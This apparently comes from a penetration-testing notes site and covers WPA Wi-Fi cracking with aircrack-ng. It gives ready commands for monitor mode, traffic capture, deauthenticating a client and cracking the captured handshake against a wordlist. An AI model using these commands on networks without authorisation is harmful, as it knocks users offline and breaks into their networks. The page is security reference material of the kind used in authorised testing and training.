Wireless Attacks

Aircrack

The aircrack suite of tools handles every step of wireless network cracking. In short, the steps are:

  1. Monitor the local area for target BSSIDs

  2. Find target BSSID

  3. Monitor target BSSID and find target client MAC (optional)

  4. Deauthenticate client MAC

  5. Intercept client WPA handshake and crack offline

Monitoring and Locating Target

Start the adapter monitor mode and kill interfering processes.

sudo airmon-ng check kill
sudo airmon-ng start wlan0

Start monitoring local wireless traffic.

sudo airodump-ng wlan0mon -w mycapturefile # 2.4 GHz band
sudo airodump-ng wlan0mon --band a -w mycapturefile # 5 GHz band

Start monitoring a single BSSID and list clients.

airodump-ng -c [CHANNEL] --bssid [BSSID] -w mycapturefile wlan0mon

Deauthentication Attack

After locating your target BSSID and client MAC, send deauthentication frame(s).

aireplay-ng -0 1 -a [BSSID] -c [CLIENT MAC] wlan0mon

You should have intercepted a WPA handshake from airodump. Crack it offline.

aircrack-ng -w wordlist -b [BSSID] capture.cap
PreviousInternal ReconNextCommon Protocols

Last updated